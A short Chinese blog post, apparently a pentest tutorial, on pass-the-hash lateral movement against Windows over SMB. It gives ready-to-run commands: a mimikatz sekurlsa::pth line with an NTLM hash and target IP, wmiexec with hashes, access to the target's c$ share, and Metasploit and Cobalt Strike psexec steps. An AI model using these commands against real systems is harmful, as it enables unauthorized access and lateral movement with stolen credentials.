hash传递攻击

简介

Pass the hash也就是Hash传递攻击,简称为PTH。模拟用户登录不需要用户明文密码只需要hash值就可以直接来登录目标系统。

利用前提条件是:

  • 开启445端口
  • 开启ipc$共享

Metasploit pesexec模块

windows/smb/psexec

这里主要设置smbuser、smbPass

这里的smbpass也可以使用明文密码登录

Mimikatz hash传递攻击

mimikatz.exe "privilege::debug"  "sekurlsa::pth /user:Administrator /domain:192.168.222.135 /ntlm:99f249f5481f98de98f14cc8985d610b" exit

运行后会出现一个弹窗,可以直接使用ipc连接

dir \\192.168.222.135\c$

wmiexec/smbexec进行hash传递

 wmiexec.exe -hashes LMHash:NTHash 用户名@目标IP

这里的wmiexec.exe是通过wmiexec.py编译的

cs的hash传递攻击

首先进行内网扫描,选择jump->psexec

选择其中的参数

稍作等待成功上线,且为system权限

powershell的hash传递攻击

这个的话总是报错,就无法执行成功,可参考其他文章进行学习

Invoke-TheHash:PowerShell实现的哈希传递攻击套件 - FreeBuf网络安全行业门户

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值